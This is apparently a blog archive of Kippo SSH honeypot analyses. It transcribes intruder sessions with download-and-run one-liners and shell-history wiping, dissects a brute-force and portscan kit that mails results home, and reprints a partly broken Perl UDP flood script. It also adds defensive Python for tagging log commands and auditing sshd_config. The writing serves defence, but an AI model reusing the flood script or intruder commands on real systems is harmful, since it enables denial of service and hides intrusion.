Tag Archives: kippo

After successfully brute forcing their way into kippo, the attacker downloaded a collection of bruteforce/portscan tools, untarred them, and kicked the whole thing off.

dev:~# wget;tar xzvf go.jpg;rm -rf go.jpg;cd go;./go 61

The malware itself seemed mostly unmodified from the last time it was reported on, but the address it phones home to was different, so I thought I’d post this so anyone dealing with the same sample has a record of movements.


1, 2, 3, 4, 5, 6, common
– these are just lists of usernames/passwords

– aab6510d149ddfbdf3598c4b94c4b7b3
– executes ‘pscan2’
– copies each password list into ‘mfu.txt’, and then launches ‘ssh-scan 100’

– a213ebd69fbc11d612d0374b373f65d8
– 615c08bb1acdf2f21490450991766187
– takes a list of users and passwords, dumps all user:pass permutations into ‘pass_file’

– the user:pass permutations from ‘’

– cbf0f41bbbafb1c2609bedb943be3b36

– 92c4c68480e699aa012b26c82a787248
– sorts ‘bios.txt’ into a unique list, saves in ‘mfu.txt’, launches ‘./ssh-scan 300’

– acba0143d0cbcf8092b8b44d914d7983
– given a block and a port, answers with responding ips in that block

– 39acbfc1e983e45308cdab2d3ec4bf34
– a bash script that checks if you are root. If you are, it renames ‘/usr/bin/mail’. This is presumably to mess with any IDS on the system.

– b51a52c9c82bb4401659b4c17c60f89f
– responsible for the content in ‘bios.txt’

– contains the results from ‘a’

– gathers system information, saves it to ‘info2’, mails it to
– given the first three octets of an IP address, executes ‘a’ on each of the 255 addresses within that /24
– periodically, the results are mailed home to
– the author has apparently never heard of a for loop, as there are 255 lines like this:

./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.18
./a $1.19
./a $1.20

Wall of Shame:

Attack Source:
Malware Host:
Malware Type: portscan / bruteforce
Phones Home: /

Short but sweet.

dev:~# w
 09:27:26 up 29 days, 19:48,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    09:27    0.00s  0.00s  0.00s w
dev:~# export HISTFILE=/dev/null
dev:~# export HISTSIZE=0
dev:~# w
 09:27:58 up 29 days, 19:49,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    09:27    0.00s  0.00s  0.00s w
dev:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
          inet addr:  Bcast:  Mask:
          inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
          RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
          collisions:0 txqueuelen:1000
          RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)

lo        Link encap:Local Loopback
          inet addr:  Mask:
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)
dev:~# wget
--2012-10-25 09:30:05--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exe

 0% [>                                      ] 1,098        0K/s  eta 1d 21h 7m 1
 0% [>                                      ] 22,818       11K/s  eta 3h 11m 15s
 0% [>                                      ] 182,850      69K/s  eta 31m 27s
 2% [>                                      ] 3,149,716    363K/s  eta 5m 52s^C
200 OK
dev:~# rm -rf .bash_history
dev:~# touch .bash_history

Seems a little odd that our friend (who appears to be on a residential, dynamically assigned IP) would go through so much effort to hide their history just to disconnect the session, but oh well.

I set up a Kippo honeypot a few weeks ago on a micro Amazon instance and left it running, eventually letting it slip my mind. Today, I remembered to check it out, and what do you know, I got some results.

Unfortunately for our intruder, Kippo wasn’t particularly cooperative. Here’s the log:

dev:~# w
15:34:22 up 13 days, 1:55, 1 user, load average: 0.00, 0.00, 0.00
root pts/0 15:34 0.00s 0.00s 0.00s w
dev:~# cat /proc/cpuinfo
[--- snip ---]
dev:~# wget
--2012-10-08 15:35:37--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100mb.test

100%[======================================>] 104,857,600 10113K/s

2012-10-08 15:35:48 (10113 KB/s) - `100mb.test' saved [104857600/104857600]
dev:~# wget
--2012-10-08 15:36:00--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 529 (529bytes) [application/octet-stream]
Saving to: `udp.tgz

100%[======================================>] 529 0K/s

2012-10-08 15:36:01 (0 KB/s) - `udp.tgz' saved [529/529]
dev:~# tar xzvf udp.tgx
tar: udp.tgx: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
dev:~# tar xzvf udp.tgz
dev:~# chmod +x *
dev:~# perl 12
bash: perl: command not found
dev:~# apt-get install perl
Reading package lists... Done
[--- snip ---]
Setting up perl (1.31-2) ...
dev:~# perl 12
perl: Segmentation fault
dev:~# apt-get install kernel*
Reading package lists... Done
[--- snip ---]
Setting up kernel (1.4-6) ...
dev:~# apt-get install linux*
Reading package lists... Done
[--- snip ---]
Setting up linux (1.12-8) ...
dev:~# perl 12
perl: Segmentation fault

This looks like a fairly typical attack. In short:

  • The hacker has connected from
  • The hacker runs w to see who else is around.
  • The hacker dumps the contents of /proc/cpuinfo to see what kind of machine they’re working with.
  • The hacker downloads, presumably to check the speed of the connection.
  • The hacker downloads hxxp:// Looks like they want to use this machine to DoS, but I’ll take a closer look at that file in good time.
  • After this, we can see the hacker’s frustrated attempts to actually RUN their file. Naturally, Kippo is pretty uncooperative, so they soon get fed up and leave.
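The three sessions on this page (the go.jpg one-liner, the HISTFILE/.bash_history clean-up, and the download, untar, chmod, run sequence above) share a handful of command patterns a honeypot operator can match on. The script below is an added example, not Kippo's own code and nothing from the attackers' kits: it groups Kippo-style CMD: lines by session, splits chained commands, tags each piece (recon, history tampering, fetch, staging, payload execution) and turns the tags into a per-session finding. The log layout is approximated from Kippo's text log; the sample lines, session ids, source addresses and the example.invalid host are constructed.

```python
import re

# Constructed Kippo-style "CMD:" lines. The layout approximates Kippo's text log;
# session ids, source addresses and the example.invalid host are made up.
SAMPLE_LOG = """\
2012-10-20 11:02:11+0000 [HoneyPotTransport,1,192.0.2.15] CMD: wget http://example.invalid/go.jpg;tar xzvf go.jpg;rm -rf go.jpg;cd go;./go 61
2012-10-25 09:27:26+0000 [HoneyPotTransport,3,198.51.100.7] CMD: w
2012-10-25 09:27:40+0000 [HoneyPotTransport,3,198.51.100.7] CMD: export HISTFILE=/dev/null
2012-10-25 09:27:41+0000 [HoneyPotTransport,3,198.51.100.7] CMD: export HISTSIZE=0
2012-10-25 09:27:50+0000 [HoneyPotTransport,3,198.51.100.7] CMD: ifconfig
2012-10-25 09:30:05+0000 [HoneyPotTransport,3,198.51.100.7] CMD: wget http://example.invalid/W2Ksp3.exe
2012-10-25 09:31:00+0000 [HoneyPotTransport,3,198.51.100.7] CMD: rm -rf .bash_history
2012-10-25 09:31:01+0000 [HoneyPotTransport,3,198.51.100.7] CMD: touch .bash_history
2012-10-08 15:34:22+0000 [HoneyPotTransport,7,203.0.113.9] CMD: w
2012-10-08 15:34:30+0000 [HoneyPotTransport,7,203.0.113.9] CMD: cat /proc/cpuinfo
2012-10-08 15:35:37+0000 [HoneyPotTransport,7,203.0.113.9] CMD: wget http://example.invalid/100mb.test
2012-10-08 15:36:00+0000 [HoneyPotTransport,7,203.0.113.9] CMD: wget http://example.invalid/udp.tgz
2012-10-08 15:36:10+0000 [HoneyPotTransport,7,203.0.113.9] CMD: tar xzvf udp.tgz
2012-10-08 15:36:12+0000 [HoneyPotTransport,7,203.0.113.9] CMD: chmod +x *
2012-10-08 15:36:20+0000 [HoneyPotTransport,7,203.0.113.9] CMD: perl 12
2012-10-08 15:40:00+0000 [HoneyPotTransport,7,203.0.113.9] connection lost
2012-10-11 02:10:00+0000 [HoneyPotTransport,9,192.0.2.44] CMD: w
2012-10-11 02:10:05+0000 [HoneyPotTransport,9,192.0.2.44] CMD: uname -a
"""

# Only command lines matter here; login/disconnect lines are skipped by analyse().
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[HoneyPotTransport,(?P<sid>\d+),(?P<src>[\d.]+)\] CMD: (?P<cmd>.*)$"
)

# Each rule is applied to one command (after splitting ';', '&&', '||' chains).
RULES = [
    ("recon",          re.compile(r"^(w|who|id|uname\b.*|ifconfig\b.*|cat /proc/cpuinfo)$")),
    ("history_tamper", re.compile(r"HISTFILE=/dev/null|HISTSIZE=0|unset HIST(FILE|SIZE)"
                                  r"|rm .*\.bash_history|ln -s /dev/null .*\.bash_history")),
    ("fetch",          re.compile(r"^(wget|curl|ftp|tftp)\b")),
    ("stage",          re.compile(r"^(tar x|unzip|gunzip|chmod \+x)")),
    ("run_payload",    re.compile(r"^(perl|python|sh|bash|\./\S+)\b")),
]


def tag_command(cmd):
    """Return the set of rule names tripped by one logged command line."""
    tags = set()
    # Attackers chain several commands on one line; judge each piece on its own.
    for piece in re.split(r"\s*(?:;|&&|\|\|)\s*", cmd):
        piece = piece.strip()
        for name, pattern in RULES:
            if pattern.search(piece):
                tags.add(name)
    return tags


def findings_for(tags):
    """Turn a session's tag set into human-readable findings."""
    findings = []
    if "history_tamper" in tags:
        findings.append("shell history tampering")
    if {"fetch", "stage"} <= tags or {"fetch", "run_payload"} <= tags:
        findings.append("download-and-execute")
    if not findings and tags <= {"recon"}:
        findings.append("reconnaissance only")
    return findings


def analyse(log_text):
    """Group CMD: lines by session id and return {sid: {source, commands, tags, findings}}."""
    sessions = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        s = sessions.setdefault(m["sid"], {"source": m["src"], "commands": [], "tags": set()})
        s["commands"].append(m["cmd"])
        s["tags"] |= tag_command(m["cmd"])
    for s in sessions.values():
        s["findings"] = findings_for(s["tags"])
        s["tags"] = sorted(s["tags"])
    return sessions


if __name__ == "__main__":
    for sid, s in analyse(SAMPLE_LOG).items():
        verdict = ", ".join(s["findings"]) or "nothing notable"
        print(f"session {sid} from {s['source']}: {verdict} (tags: {', '.join(s['tags'])})")
```

Splitting on `;` matters: the go.jpg session is a single logged line, and without the split the `tar` and `./go` pieces would never be seen. The rule list is deliberately small; the point is that the stage after the download (untar, chmod, run) is what separates a bandwidth test from a dropper.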

Now we can take a look at How exciting. The script itself is pretty obvious stuff, so I’ll go ahead and post it. Comments are mine:


use Socket;


if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "for any info vizit #GlobaL \n";

# Takes three arguments: Target, port, and how long to flood for.
my ($ip,$port,$size,$time);

# Prepares a socket connection. The last parameter is for the protocol, so I'm assuming 17 corresponds to UDP.
socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "Flooding.. $ip port.. $port \n";

# If you haven't declared the port or duration...
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
# If you HAVE declared the port and duration
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
# If you have declared the port, but not the duration
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
# If you've declared the duration, but not the port
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;

# Flood the given port
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));

# Flood a random port
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));

If you’re going to allow ssh access to your server, remember to secure it. Even if you don’t have any data worth stealing, it’s easy for people to turn your machine against others.
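As an added example of what "secure it" looks like in sshd_config terms (my code, not from the page): a small auditor that reads the global section of an sshd_config, applies the two rules that most often bite people (the first occurrence of a keyword wins, and anything after a Match line is conditional), and reports the settings that let a brute-force attack like the one that got into Kippo succeed. The two config fragments are constructed, and the fallback values for absent keywords are the OpenSSH defaults of the 2012 era; that is an assumption, so confirm on a real host with `sshd -T`.

```python
import re

# Constructed sshd_config fragments (not from the page). The first resembles a
# stock install that still takes root passwords; the second is the hardened form.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6
# PubkeyAuthentication yes
"""

HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
MaxAuthTries 3
AllowUsers deploy
"""

# Value sshd uses when a keyword is absent. These are the compiled-in OpenSSH
# defaults of the 2012 era (assumption: confirm on your build with `sshd -T`).
DEFAULTS = {
    "permitrootlogin": "yes",
    "passwordauthentication": "yes",
    "challengeresponseauthentication": "yes",
    "pubkeyauthentication": "yes",
    "maxauthtries": "6",
}


def parse_sshd_config(text):
    """Return global settings as {lowercase keyword: value}.

    Two sshd_config rules are mirrored: the first occurrence of a keyword wins
    (a later 'PasswordAuthentication no' does not override an earlier 'yes'),
    and everything after a Match line is conditional, so only the section
    before the first Match block is audited.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        settings.setdefault(key, value)      # first occurrence wins
    return settings


def audit_sshd_config(text):
    """Return a list of findings; empty when the global section looks hardened."""
    settings = parse_sshd_config(text)

    def get(key):
        return settings.get(key, DEFAULTS[key]).lower()

    findings = []
    if get("permitrootlogin") == "yes":
        findings.append("PermitRootLogin yes: root can be brute-forced directly")
    if get("passwordauthentication") == "yes":
        findings.append("PasswordAuthentication yes: password guessing is possible")
    if get("challengeresponseauthentication") == "yes":
        findings.append("ChallengeResponseAuthentication yes: keyboard-interactive can still prompt for a password")
    if get("pubkeyauthentication") != "yes":
        findings.append("PubkeyAuthentication off: no key-based alternative to passwords")
    if int(get("maxauthtries")) > 3:
        findings.append(f"MaxAuthTries {get('maxauthtries')}: more guesses per connection than needed")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        problems = audit_sshd_config(cfg)
        print(f"{name}: {len(problems)} finding(s)")
        for p in problems:
            print("  -", p)
```

The weak fragment trips four checks (root login, password auth, the absent ChallengeResponseAuthentication falling back to yes, and six tries per connection); the hardened one trips none. Pair this with key-only logins and something like fail2ban in front of sshd, and the brute-force stage that opened every session on this page stops working.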